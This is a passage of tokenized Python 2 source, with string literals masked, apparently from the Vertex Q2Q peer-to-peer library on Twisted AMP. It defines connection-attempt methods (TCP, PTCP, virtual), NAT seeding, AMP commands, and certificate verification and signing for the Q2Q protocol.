toAddress = toAddress <EOL> self . protocolName = protocolName <EOL> self . connectionEstablishedDeferred = connectionEstablishedDeferred <EOL> connectionEstablishedDeferred . addCallback ( self . 
setMyClient ) <EOL> myClient = None <EOL> def setMyClient ( self , myClient ) : <EOL> self . myClient = myClient <EOL> return myClient <EOL> def buildProtocol ( self , addr ) : <EOL> subProto = self . cpf . buildProtocol ( self . toAddress ) <EOL> myProto = SeparateConnectionTransport ( self . service , subProto , self . fromAddress , <EOL> self . toAddress , self . protocolName , <EOL> self . connectionEstablishedDeferred ) <EOL> return myProto <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> assert self . myClient is None <EOL> self . connectionEstablishedDeferred . errback ( reason ) <EOL> def clientConnectionLost ( self , connector , reason ) : <EOL> if self . myClient is not None : <EOL> self . cpf . clientConnectionLost ( connector , reason ) <EOL> def doStart ( self ) : <EOL> self . cpf . doStart ( ) <EOL> def doStop ( self ) : <EOL> self . cpf . doStop ( ) <EOL> class ImmediatelyLoseConnection ( protocol . Protocol ) : <EOL> def connectionMade ( self ) : <EOL> self . transport . loseConnection ( ) <EOL> class AbstractConnectionAttempt ( protocol . ClientFactory ) : <EOL> def __init__ ( self , method , q2qproto , connectionID , fromAddress , toAddress , <EOL> protocolName , clientProtocolFactory , issueGreeting = False ) : <EOL> self . method = method <EOL> self . q2qproto = q2qproto <EOL> assert isinstance ( connectionID , str ) <EOL> self . connectionID = connectionID <EOL> self . q2qproto = q2qproto <EOL> self . fromAddress = fromAddress <EOL> self . toAddress = toAddress <EOL> self . protocolName = protocolName <EOL> self . deferred = defer . Deferred ( ) <EOL> self . clientProtocolFactory = Q2QClientProtocolFactoryWrapper ( <EOL> q2qproto . service , <EOL> clientProtocolFactory , fromAddress , toAddress , protocolName , <EOL> self . deferred ) <EOL> self . 
issueGreeting = issueGreeting <EOL> def startAttempt ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> q2qb = None <EOL> cancelled = False <EOL> def buildProtocol ( self , addr ) : <EOL> if self . cancelled : <EOL> return ImmediatelyLoseConnection ( ) <EOL> assert self . q2qb is None <EOL> self . q2qb = Q2QBootstrap ( <EOL> self . connectionID , self . clientProtocolFactory ) <EOL> return self . q2qb <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> """<STR_LIT:U+0020>""" <EOL> def clientConnectionLost ( self , connector , reason ) : <EOL> """<STR_LIT:U+0020>""" <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> self . cancelled = True <EOL> class TCPConnectionAttempt ( AbstractConnectionAttempt ) : <EOL> attempted = False <EOL> def startAttempt ( self ) : <EOL> assert not self . attempted <EOL> self . attempted = True <EOL> reactor . connectTCP ( self . method . host , self . method . port , self ) <EOL> return self . deferred <EOL> class TCPMethod : <EOL> def __init__ ( self , hostport ) : <EOL> self . host , port = hostport . split ( '<STR_LIT::>' ) <EOL> self . port = int ( port ) <EOL> attemptFactory = TCPConnectionAttempt <EOL> relayable = True <EOL> ptype = '<STR_LIT>' <EOL> def toString ( self ) : <EOL> return '<STR_LIT>' % ( self . ptype , self . host , self . port ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . toString ( ) <EOL> def attempt ( self , * a ) : <EOL> return [ self . attemptFactory ( self , * a ) ] <EOL> connectionCounter = itertools . count ( ) . next <EOL> connectionCounter ( ) <EOL> class VirtualConnectionAttempt ( AbstractConnectionAttempt ) : <EOL> attempted = False <EOL> def startAttempt ( self ) : <EOL> assert not self . attempted <EOL> self . attempted = True <EOL> cid = connectionCounter ( ) <EOL> if self . q2qproto . isServer : <EOL> cid = - cid <EOL> innerTransport = VirtualTransport ( self . 
q2qproto , cid , self , True ) <EOL> def startit ( result ) : <EOL> innerTransport . startProtocol ( ) <EOL> return self . deferred <EOL> d = self . q2qproto . callRemote ( Virtual , id = cid ) <EOL> d . addCallback ( startit ) <EOL> return d <EOL> class VirtualMethod : <EOL> def __init__ ( self , virt = None ) : <EOL> pass <EOL> relayable = False <EOL> def toString ( self ) : <EOL> return '<STR_LIT>' <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . toString ( ) , ) <EOL> def attempt ( self , * a ) : <EOL> return [ VirtualConnectionAttempt ( self , * a ) ] <EOL> class _PTCPConnectionAttempt1NoPress ( AbstractConnectionAttempt ) : <EOL> attempted = False <EOL> def startAttempt ( self ) : <EOL> assert not self . attempted <EOL> self . attempted = True <EOL> svc = self . q2qproto . service <EOL> dsp = svc . dispatcher <EOL> dsp . connectPTCP ( <EOL> self . method . host , self . method . port , self , <EOL> svc . sharedUDPPortnum ) <EOL> return self . deferred <EOL> class _PTCPConnectionAttemptPress ( AbstractConnectionAttempt ) : <EOL> attempted = False <EOL> def startAttempt ( self ) : <EOL> assert not self . attempted <EOL> self . attempted = True <EOL> svc = self . q2qproto . service <EOL> dsp = svc . dispatcher <EOL> newPort = self . newPort = dsp . bindNewPort ( ) <EOL> dsp . connectPTCP ( <EOL> self . method . host , self . method . port , self , <EOL> newPort ) <EOL> return self . deferred <EOL> def cancel ( self ) : <EOL> if not self . cancelled : <EOL> self . q2qproto . service . dispatcher . unbindPort ( self . newPort ) <EOL> else : <EOL> print '<STR_LIT>' <EOL> AbstractConnectionAttempt . 
cancel ( self ) <EOL> class PTCPMethod ( TCPMethod ) : <EOL> """<STR_LIT>""" <EOL> ptype = '<STR_LIT>' <EOL> def attempt ( self , * a ) : <EOL> return [ _PTCPConnectionAttempt1NoPress ( self , * a ) , <EOL> _PTCPConnectionAttemptPress ( self , * a ) ] <EOL> class RPTCPConnectionAttempt ( AbstractConnectionAttempt ) : <EOL> attempted = False <EOL> def startAttempt ( self ) : <EOL> assert not self . attempted <EOL> self . attempted = True <EOL> realLocalUDP = self . newPort = self . q2qproto . service . dispatcher . seedNAT ( ( self . method . host , self . method . port ) ) <EOL> def enbinden ( boundereded ) : <EOL> if not self . cancelled : <EOL> self . q2qproto . service . dispatcher . connectPTCP ( <EOL> self . method . host , self . method . port , self , realLocalUDP <EOL> ) <EOL> return self . deferred <EOL> def swallowKnown ( error ) : <EOL> error . trap ( ConnectionError ) <EOL> self . deferred . errback ( CONNECTION_DONE ) <EOL> return self . deferred <EOL> d = self . q2qproto . callRemote ( <EOL> BindUDP , <EOL> q2qsrc = self . toAddress , <EOL> q2qdst = self . fromAddress , <EOL> protocol = self . protocolName , <EOL> udpsrc = ( self . method . host , self . method . port ) , <EOL> udpdst = ( self . q2qproto . _determinePublicIP ( ) , realLocalUDP ) ) <EOL> d . addCallbacks ( enbinden , swallowKnown ) <EOL> return d <EOL> def cancel ( self ) : <EOL> if not self . cancelled : <EOL> self . q2qproto . service . dispatcher . unbindPort ( self . newPort ) <EOL> else : <EOL> print '<STR_LIT>' <EOL> AbstractConnectionAttempt . cancel ( self ) <EOL> class RPTCPMethod ( TCPMethod ) : <EOL> """<STR_LIT>""" <EOL> ptype = '<STR_LIT>' <EOL> attemptFactory = RPTCPConnectionAttempt <EOL> class UnknownMethod : <EOL> relayable = True <EOL> def __init__ ( self , S ) : <EOL> self . string = S <EOL> def attemptConnect ( self , q2qproto , connectionID , From , to , <EOL> protocolName , protocolFactory ) : <EOL> return defer . 
fail ( Failure ( ConnectionError ( <EOL> "<STR_LIT>" % ( self . string , ) ) ) ) <EOL> _methodFactories = { '<STR_LIT>' : VirtualMethod , <EOL> '<STR_LIT>' : TCPMethod , <EOL> '<STR_LIT>' : PTCPMethod , <EOL> '<STR_LIT>' : RPTCPMethod } <EOL> class Method ( Argument ) : <EOL> def toString ( self , inObj ) : <EOL> return inObj . toString ( ) <EOL> def fromString ( self , inString ) : <EOL> f = inString . split ( "<STR_LIT:@>" , <NUM_LIT:1> ) <EOL> factoryName = f [ <NUM_LIT:0> ] <EOL> if len ( f ) > <NUM_LIT:1> : <EOL> factoryData = f [ <NUM_LIT:1> ] <EOL> else : <EOL> factoryData = '<STR_LIT>' <EOL> methodFactory = _methodFactories . get ( factoryName , None ) <EOL> if methodFactory is None : <EOL> factory = UnknownMethod ( inString ) <EOL> else : <EOL> factory = methodFactory ( factoryData ) <EOL> return factory <EOL> class Secure ( StartTLS ) : <EOL> commandName = "<STR_LIT>" <EOL> arguments = StartTLS . arguments + [ <EOL> ( '<STR_LIT>' , Q2QAddressArgument ( optional = True ) ) , <EOL> ( '<STR_LIT:to>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT>' , Boolean ( ) ) <EOL> ] <EOL> class Listen ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ <EOL> ( '<STR_LIT>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT>' , ListOf ( String ( ) ) ) , <EOL> ( '<STR_LIT:description>' , Unicode ( ) ) ] <EOL> result = [ ] <EOL> class ConnectionStartBox ( AmpBox ) : <EOL> def __init__ ( self , __transport ) : <EOL> super ( ConnectionStartBox , self ) . __init__ ( ) <EOL> self . virtualTransport = __transport <EOL> def _sendTo ( self , proto ) : <EOL> super ( ConnectionStartBox , self ) . _sendTo ( proto ) <EOL> self . virtualTransport . startProtocol ( ) <EOL> class Virtual ( Command ) : <EOL> commandName = '<STR_LIT>' <EOL> result = [ ] <EOL> arguments = [ ( '<STR_LIT:id>' , Integer ( ) ) ] <EOL> def makeResponse ( cls , objects , proto ) : <EOL> tpt = objects . pop ( '<STR_LIT>' ) <EOL> return _objectsToStrings ( <EOL> objects , cls . 
response , <EOL> ConnectionStartBox ( tpt ) , <EOL> proto ) <EOL> makeResponse = classmethod ( makeResponse ) <EOL> class Identify ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ ( '<STR_LIT>' , Q2QAddressArgument ( ) ) ] <EOL> response = [ ( '<STR_LIT>' , Cert ( ) ) ] <EOL> class BindUDP ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ <EOL> ( '<STR_LIT>' , String ( ) ) , <EOL> ( '<STR_LIT>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT>' , HostPort ( ) ) , <EOL> ( '<STR_LIT>' , HostPort ( ) ) , <EOL> ] <EOL> errors = { ConnectionError : '<STR_LIT>' } <EOL> response = [ ] <EOL> class SourceIP ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ ] <EOL> response = [ ( '<STR_LIT>' , String ( ) ) ] <EOL> class Inbound ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ ( '<STR_LIT>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT:to>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT>' , String ( ) ) , <EOL> ( '<STR_LIT>' , HostPort ( optional = True ) ) ] <EOL> response = [ ( '<STR_LIT>' , AmpList ( <EOL> [ ( '<STR_LIT:id>' , String ( ) ) , <EOL> ( '<STR_LIT>' , Cert ( optional = True ) ) , <EOL> ( '<STR_LIT>' , ListOf ( Method ( ) ) ) , <EOL> ( '<STR_LIT>' , AmpTime ( ) ) , <EOL> ( '<STR_LIT:description>' , Unicode ( ) ) ] ) ) ] <EOL> errors = { KeyError : "<STR_LIT>" } <EOL> fatalErrors = { VerifyError : "<STR_LIT>" } <EOL> class Outbound ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ ( '<STR_LIT>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT:to>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT>' , String ( ) ) , <EOL> ( '<STR_LIT:id>' , String ( ) ) , <EOL> ( '<STR_LIT>' , ListOf ( Method ( ) ) ) ] <EOL> response = [ ] <EOL> errors = { AttemptsFailed : '<STR_LIT>' } <EOL> class Sign ( Command ) : <EOL> commandName = '<STR_LIT>' 
<EOL> arguments = [ ( '<STR_LIT>' , CertReq ( ) ) , <EOL> ( '<STR_LIT:password>' , String ( ) ) ] <EOL> response = [ ( '<STR_LIT>' , Cert ( ) ) ] <EOL> errors = { KeyError : "<STR_LIT>" , <EOL> BadCertificateRequest : "<STR_LIT>" } <EOL> class Choke ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ ( '<STR_LIT:id>' , Integer ( ) ) ] <EOL> requiresAnswer = False <EOL> class Unchoke ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ ( '<STR_LIT:id>' , Integer ( ) ) ] <EOL> requiresAnswer = False <EOL> def safely ( f , * a , ** k ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> f ( * a , ** k ) <EOL> except : <EOL> log . err ( ) <EOL> class Q2Q ( AMP , subproducer . SuperProducer ) : <EOL> """<STR_LIT>""" <EOL> protocolName = '<STR_LIT>' <EOL> service = None <EOL> publicIP = None <EOL> authorized = False <EOL> def __init__ ( self , * a , ** kw ) : <EOL> """<STR_LIT>""" <EOL> subproducer . SuperProducer . __init__ ( self ) <EOL> AMP . __init__ ( self , * a , ** kw ) <EOL> def connectionMade ( self ) : <EOL> self . producingTransports = { } <EOL> self . connections = { } <EOL> self . listeningClient = [ ] <EOL> self . connectionObservers = [ ] <EOL> if self . service . publicIP is None : <EOL> log . msg ( "<STR_LIT>" ) <EOL> self . service . publicIP = self . transport . getHost ( ) . host <EOL> self . service . _publicIPIsReallyPrivate = True <EOL> def rememberPublicIP ( pubip ) : <EOL> ip = pubip [ '<STR_LIT>' ] <EOL> log . msg ( '<STR_LIT>' % ip ) <EOL> self . publicIP = ip <EOL> self . service . publicIP = ip <EOL> self . service . _publicIPIsReallyPrivate = False <EOL> self . callRemote ( SourceIP ) . addCallback ( rememberPublicIP ) <EOL> else : <EOL> log . msg ( "<STR_LIT>" % ( self . service . publicIP , ) ) <EOL> def connectionLost ( self , reason ) : <EOL> "<STR_LIT>" <EOL> AMP . connectionLost ( self , reason ) <EOL> self . _uncacheMe ( ) <EOL> self . 
producingTransports = { } <EOL> for key , value in self . listeningClient : <EOL> log . msg ( "<STR_LIT>" % ( key , ) ) <EOL> self . service . listeningClients [ key ] . remove ( value ) <EOL> self . listeningClient = [ ] <EOL> for xport in self . connections . values ( ) : <EOL> safely ( xport . connectionLost , reason ) <EOL> for observer in self . connectionObservers : <EOL> safely ( observer ) <EOL> def notifyOnConnectionLost ( self , observer ) : <EOL> "<STR_LIT>" <EOL> self . connectionObservers . append ( observer ) <EOL> def _bindUDP ( self , q2qsrc , q2qdst , udpsrc , udpdst , protocol ) : <EOL> self . verifyCertificateAllowed ( q2qsrc , q2qdst ) <EOL> srchost , srcport = udpsrc <EOL> lcget = self . service . listeningClients . get ( ( q2qsrc , protocol ) , ( ) ) <EOL> bindery = [ ] <EOL> for ( listener , listenCert , desc <EOL> ) in lcget : <EOL> if listener . transport . getPeer ( ) . host == srchost : <EOL> d = listener . callRemote ( <EOL> BindUDP , <EOL> q2qsrc = q2qsrc , <EOL> q2qdst = q2qdst , <EOL> udpsrc = udpsrc , <EOL> udpdst = udpdst , <EOL> protocol = protocol ) <EOL> def swallowKnown ( err ) : <EOL> err . trap ( error . ConnectionDone , error . ConnectionLost ) <EOL> d . addErrback ( swallowKnown ) <EOL> bindery . append ( d ) <EOL> if bindery : <EOL> def _justADict ( ign ) : <EOL> return dict ( ) <EOL> return defer . DeferredList ( bindery ) . addCallback ( _justADict ) <EOL> if ( self . service . getLocalFactories ( q2qdst , q2qsrc , protocol ) <EOL> and srchost == self . _determinePublicIP ( ) ) : <EOL> self . service . dispatcher . seedNAT ( udpdst , srcport , conditional = True ) <EOL> return dict ( ) <EOL> raise ConnectionError ( "<STR_LIT>" ) <EOL> BindUDP . responder ( _bindUDP ) <EOL> def _identify ( self , subject ) : <EOL> """<STR_LIT>""" <EOL> ourPrivateCert = self . service . certificateStorage . getPrivateCertificate ( <EOL> str ( subject ) <EOL> ) <EOL> ourCA = Certificate ( ourPrivateCert . 
original ) <EOL> return dict ( certificate = ourCA ) <EOL> Identify . responder ( _identify ) <EOL> def verifyCertificateAllowed ( self , <EOL> ourAddress , <EOL> theirAddress ) : <EOL> """<STR_LIT>""" <EOL> if not self . authorized : <EOL> if theirAddress . domain == '<STR_LIT>' : <EOL> return True <EOL> raise VerifyError ( "<STR_LIT>" ) <EOL> peerCert = Certificate . peerFromTransport ( self . transport ) <EOL> ourCert = self . hostCertificate <EOL> ourClaimedDomain = ourAddress . domainAddress ( ) <EOL> theirClaimedDomain = theirAddress . domainAddress ( ) <EOL> if not ourClaimedDomain . claimedAsIssuerOf ( ourCert ) : <EOL> raise VerifyError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( ourClaimedDomain , <EOL> ourCert . getIssuer ( ) ) ) <EOL> if theirClaimedDomain . claimedAsIssuerOf ( peerCert ) : <EOL> if theirAddress . claimedAsSubjectOf ( peerCert ) or theirClaimedDomain . claimedAsSubjectOf ( peerCert ) : <EOL> return <EOL> elif ourClaimedDomain . claimedAsIssuerOf ( peerCert ) : <EOL> return <EOL> elif ourAddress . claimedAsIssuerOf ( peerCert ) : <EOL> return <EOL> raise VerifyError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( ourCert , peerCert , <EOL> ourAddress , theirAddress ) ) <EOL> def _listen ( self , protocols , From , description ) : <EOL> """<STR_LIT>""" <EOL> self . verifyCertificateAllowed ( From , From ) <EOL> theirCert = Certificate . peerFromTransport ( self . transport ) <EOL> for protocolName in protocols : <EOL> if protocolName . startswith ( '<STR_LIT:.>' ) : <EOL> raise VerifyError ( <EOL> "<STR_LIT>" % <EOL> protocolName ) <EOL> key = ( From , protocolName ) <EOL> value = ( self , theirCert , description ) <EOL> log . msg ( "<STR_LIT>" % key ) <EOL> self . listeningClient . append ( ( key , value ) ) <EOL> self . service . listeningClients . setdefault ( key , [ ] ) . append ( value ) <EOL> return { } <EOL> Listen . 
responder ( _listen ) <EOL> def _inbound ( self , From , to , protocol , udp_source = None ) : <EOL> """<STR_LIT>""" <EOL> self . verifyCertificateAllowed ( to , From ) <EOL> return self . service . verifyHook ( From , to , protocol <EOL> ) . addCallback ( self . _inboundimpl , <EOL> From , <EOL> to , <EOL> protocol , <EOL> udp_source ) . addErrback ( <EOL> lambda f : f . trap ( KeyError ) and dict ( listeners = [ ] ) ) <EOL> Inbound . responder ( _inbound ) <EOL> def _inboundimpl ( self , ign , From , to , protocol , udp_source ) : <EOL> srvfacts = self . service . getLocalFactories ( From , to , protocol ) <EOL> result = [ ] <EOL> if srvfacts : <EOL> log . msg ( "<STR_LIT>" % ( srvfacts , ) ) <EOL> localMethods = [ ] <EOL> publicIP = self . _determinePublicIP ( ) <EOL> privateIP = self . _determinePrivateIP ( ) <EOL> if self . service . inboundTCPPort is not None : <EOL> tcpPort = self . service . inboundTCPPort . getHost ( ) . port <EOL> localMethods . append ( TCPMethod ( <EOL> '<STR_LIT>' % <EOL> ( publicIP , tcpPort ) ) ) <EOL> if publicIP != privateIP : <EOL> localMethods . append ( TCPMethod ( <EOL> '<STR_LIT>' % <EOL> ( privateIP , tcpPort ) ) ) <EOL> if not self . service . udpEnabled : <EOL> log . msg ( "<STR_LIT>" ) <EOL> elif udp_source is None : <EOL> log . msg ( "<STR_LIT>" ) <EOL> else : <EOL> if self . service . dispatcher is None : <EOL> log . msg ( "<STR_LIT>" % <EOL> udp_source ) <EOL> else : <EOL> remoteUDPHost , remoteUDPPort = udp_source <EOL> log . msg ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( remoteUDPHost , remoteUDPPort , publicIP , privateIP ) ) <EOL> udpPort = self . service . dispatcher . seedNAT ( udp_source , self . service . sharedUDPPortnum ) <EOL> if remoteUDPHost == publicIP and publicIP != privateIP : <EOL> log . msg ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( publicIP , privateIP ) ) <EOL> localMethods . append ( <EOL> PTCPMethod ( "<STR_LIT>" % ( privateIP , udpPort ) ) ) <EOL> localMethods . 
append ( <EOL> PTCPMethod ( "<STR_LIT>" % ( publicIP , udpPort ) ) ) <EOL> privateUDPPort = self . service . dispatcher . seedNAT ( udp_source ) <EOL> localMethods . append ( <EOL> PTCPMethod ( '<STR_LIT>' % ( publicIP , privateUDPPort ) ) ) <EOL> udpxPort = self . service . dispatcher . seedNAT ( udp_source ) <EOL> localMethods . append ( <EOL> RPTCPMethod ( "<STR_LIT>" % ( publicIP , udpxPort ) ) ) <EOL> if self . service . virtualEnabled : <EOL> localMethods . append ( VirtualMethod ( ) ) <EOL> log . msg ( '<STR_LIT>' % ( localMethods , ) ) <EOL> for serverFactory , description in srvfacts : <EOL> expiryTime , listenID = self . service . mapListener ( <EOL> to , From , protocol , serverFactory ) <EOL> result . append ( dict ( id = listenID , <EOL> expires = expiryTime , <EOL> methods = localMethods , <EOL> description = description ) ) <EOL> key = ( to , protocol ) <EOL> if key in self . service . listeningClients : <EOL> args = dict ( From = From , <EOL> to = to , <EOL> protocol = protocol , <EOL> udp_source = udp_source ) <EOL> DL = [ ] <EOL> lclients = self . service . listeningClients [ key ] <EOL> log . msg ( "<STR_LIT>" % ( to , protocol ) ) <EOL> for listener , listenCert , desc in lclients : <EOL> log . msg ( "<STR_LIT>" % ( to , listener ) ) <EOL> DL . append ( listener . callRemote ( Inbound , ** args ) . addCallback ( <EOL> self . _massageClientInboundResponse , listener , result ) ) <EOL> def allListenerResponses ( x ) : <EOL> log . msg ( "<STR_LIT>" % ( pformat ( result ) , ) ) <EOL> return dict ( listeners = result ) <EOL> return defer . DeferredList ( DL ) . addCallback ( allListenerResponses ) <EOL> else : <EOL> log . msg ( "<STR_LIT>" % ( to , protocol , result ) ) <EOL> return dict ( listeners = result ) <EOL> def _massageClientInboundResponse ( self , inboundResponse , listener , result ) : <EOL> irl = inboundResponse [ '<STR_LIT>' ] <EOL> log . 
msg ( "<STR_LIT>" % <EOL> ( inboundResponse , listener ) ) <EOL> for listenerInfo in irl : <EOL> listenerInfo [ '<STR_LIT>' ] = [ <EOL> meth for meth in listenerInfo [ '<STR_LIT>' ] if meth . relayable ] <EOL> if listenerInfo [ '<STR_LIT>' ] : <EOL> allowedCertificate = Certificate . peerFromTransport ( <EOL> listener . transport ) <EOL> listenerInfo [ '<STR_LIT>' ] = allowedCertificate <EOL> result . append ( listenerInfo ) <EOL> def _determinePublicIP ( self ) : <EOL> reservePublicIP = None <EOL> if self . service . publicIP is not None : <EOL> if self . service . _publicIPIsReallyPrivate : <EOL> reservePublicIP = self . service . publicIP <EOL> else : <EOL> return self . service . publicIP <EOL> if self . publicIP is not None : <EOL> return self . publicIP <EOL> if reservePublicIP is not None : <EOL> return reservePublicIP <EOL> return self . _determinePrivateIP ( ) <EOL> def _determinePrivateIP ( self ) : <EOL> return self . transport . getHost ( ) . host <EOL> def _sourceIP ( self ) : <EOL> result = { '<STR_LIT>' : self . transport . getPeer ( ) . host } <EOL> return result <EOL> SourceIP . responder ( _sourceIP ) <EOL> def _resume ( self , connection , data , writeDeferred ) : <EOL> try : <EOL> connection . dataReceived ( data ) <EOL> except : <EOL> writeDeferred . errback ( ) <EOL> else : <EOL> writeDeferred . callback ( { } ) <EOL> def _choke ( self , id ) : <EOL> connection = self . connections [ id ] <EOL> connection . choke ( ) <EOL> return { } <EOL> Choke . responder ( _choke ) <EOL> def _unchoke ( self , id ) : <EOL> connection = self . connections [ id ] <EOL> connection . unchoke ( ) <EOL> return { } <EOL> Unchoke . responder ( _unchoke ) <EOL> def amp_WRITE ( self , box ) : <EOL> """<STR_LIT>""" <EOL> id = int ( box [ '<STR_LIT:id>' ] ) <EOL> if id not in self . connections : <EOL> raise error . ConnectionDone ( ) <EOL> connection = self . connections [ id ] <EOL> data = box [ '<STR_LIT:body>' ] <EOL> connection . 
dataReceived ( data ) <EOL> return AmpBox ( ) <EOL> def amp_CLOSE ( self , box ) : <EOL> """<STR_LIT>""" <EOL> connection = self . connections [ int ( box [ '<STR_LIT:id>' ] ) ] <EOL> connection . connectionLost ( Failure ( CONNECTION_DONE ) ) <EOL> return AmpBox ( ) <EOL> def _sign ( self , certificate_request , password ) : <EOL> """<STR_LIT>""" <EOL> if self . service . portal is None : <EOL> raise BadCertificateRequest ( "<STR_LIT>" ) <EOL> subj = certificate_request . getSubject ( ) <EOL> sk = subj . keys ( ) <EOL> if '<STR_LIT>' not in sk : <EOL> raise BadCertificateRequest ( <EOL> "<STR_LIT>" % ( sk , ) ) <EOL> uandd = subj . commonName . split ( "<STR_LIT:@>" ) <EOL> if len ( uandd ) != <NUM_LIT:2> : <EOL> raise BadCertificateRequest ( "<STR_LIT>" ) <EOL> domain = uandd [ <NUM_LIT:1> ] <EOL> CS = self . service . certificateStorage <EOL> ourCert = CS . getPrivateCertificate ( domain ) <EOL> D = self . service . portal . login ( <EOL> UsernamePassword ( subj . commonName , <EOL> password ) , <EOL> self , <EOL> ivertex . IQ2QUser ) <EOL> def _ ( ial ) : <EOL> ( iface , aspect , logout ) = ial <EOL> ser = CS . genSerial ( domain ) <EOL> return dict ( certificate = aspect . signCertificateRequest ( <EOL> certificate_request , ourCert , ser ) ) <EOL> return D . addCallback ( _ ) <EOL> Sign . responder ( _sign ) <EOL> def _secure ( self , to , From , authorize ) : <EOL> """<STR_LIT>""" <EOL> if self . hostCertificate is not None : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> CS = self . service . certificateStorage <EOL> ourCert = CS . getPrivateCertificate ( str ( to . domainAddress ( ) ) ) <EOL> if authorize : <EOL> D = CS . getSelfSignedCertificate ( str ( From . domainAddress ( ) ) ) <EOL> else : <EOL> self . authorized = False <EOL> return { '<STR_LIT>' : ourCert } <EOL> def hadCert ( peerSigned ) : <EOL> self . authorized = True <EOL> self . 
_cacheMeNow ( From , to , authorize ) <EOL> return { '<STR_LIT>' : ourCert , <EOL> '<STR_LIT>' : [ peerSigned ] } <EOL> def didNotHaveCert ( err ) : <EOL> err . trap ( KeyError ) <EOL> return self . _retrieveRemoteCertificate ( From , port ) <EOL> D . addErrback ( didNotHaveCert ) <EOL> D . addCallback ( hadCert ) <EOL> return D <EOL> Secure . responder ( _secure ) <EOL> _cachedUnrequested = False <EOL> def _cacheMeNow ( self , From , to , authorize ) : <EOL> tcpeer = self . transport . getPeer ( ) <EOL> self . service . secureConnectionCache . cacheUnrequested ( <EOL> endpoint . TCPEndpoint ( tcpeer . host , port ) , <EOL> ( From , to . domain , authorize ) , self ) <EOL> assert not self . _cachedUnrequested <EOL> self . _cachedUnrequested = ( From , to , authorize , tcpeer ) <EOL> def _uncacheMe ( self ) : <EOL> if self . _cachedUnrequested : <EOL> From , to , authorize , tcpeer = self . _cachedUnrequested <EOL> self . service . secureConnectionCache . connectionLostForKey ( <EOL> ( endpoint . TCPEndpoint ( tcpeer . host , port ) , <EOL> ( From , to . domain , authorize ) ) ) <EOL> def _retrieveRemoteCertificate ( self , From , port = port ) : <EOL> """<STR_LIT>""" <EOL> CS = self . service . certificateStorage <EOL> host = str ( From . domainAddress ( ) ) <EOL> p = AMP ( ) <EOL> p . wrapper = self . wrapper <EOL> f = protocol . ClientCreator ( reactor , lambda : p ) <EOL> connD = f . connectTCP ( host , port ) <EOL> def connected ( proto ) : <EOL> dhost = From . domainAddress ( ) <EOL> iddom = proto . callRemote ( Identify , subject = dhost ) <EOL> def gotCert ( identifyBox ) : <EOL> theirCert = identifyBox [ '<STR_LIT>' ] <EOL> theirIssuer = theirCert . getIssuer ( ) . commonName <EOL> theirName = theirCert . getSubject ( ) . 
commonName <EOL> if ( theirName != str ( dhost ) ) : <EOL> raise VerifyError ( <EOL> "<STR_LIT>" <EOL> % ( theirName , dhost ) ) <EOL> if ( theirIssuer != str ( dhost ) ) : <EOL> raise VerifyError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( dhost , theirIssuer ) ) <EOL> def storedCert ( ignored ) : <EOL> return theirCert <EOL> return CS . storeSelfSignedCertificate ( <EOL> str ( dhost ) , theirCert ) . addCallback ( storedCert ) <EOL> def nothingify ( x ) : <EOL> proto . transport . loseConnection ( ) <EOL> return x <EOL> return iddom . addCallback ( gotCert ) . addBoth ( nothingify ) <EOL> connD . addCallback ( connected ) <EOL> return connD <EOL> def secure ( self , fromAddress , toAddress , <EOL> fromCertificate , foreignCertificateAuthority = None , <EOL> authorize = True ) : <EOL> """<STR_LIT>""" <EOL> if self . hostCertificate is not None : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> def _cbSecure ( response ) : <EOL> if foreignCertificateAuthority is not None : <EOL> self . authorized = True <EOL> return True <EOL> extra = { '<STR_LIT>' : fromCertificate } <EOL> if foreignCertificateAuthority is not None : <EOL> extra [ '<STR_LIT>' ] = [ foreignCertificateAuthority ] <EOL> return self . callRemote ( <EOL> Secure , <EOL> From = fromAddress , <EOL> to = toAddress , <EOL> authorize = authorize , ** extra ) . addCallback ( _cbSecure ) <EOL> def _virtual ( self , id ) : <EOL> if self . isServer : <EOL> assert id > <NUM_LIT:0> <EOL> else : <EOL> assert id < <NUM_LIT:0> <EOL> tpt = VirtualTransport ( self , id , self . service . _bootstrapFactory , False ) <EOL> return dict ( __transport__ = tpt ) <EOL> Virtual . responder ( _virtual ) <EOL> def attemptConnectionMethods ( self , methods , connectionID , From , to , <EOL> protocolName , protocolFactory ) : <EOL> attemptObjects = [ ] <EOL> for meth in methods : <EOL> atts = meth . attempt ( self , connectionID , From , to , <EOL> protocolName , protocolFactory ) <EOL> attemptObjects . 
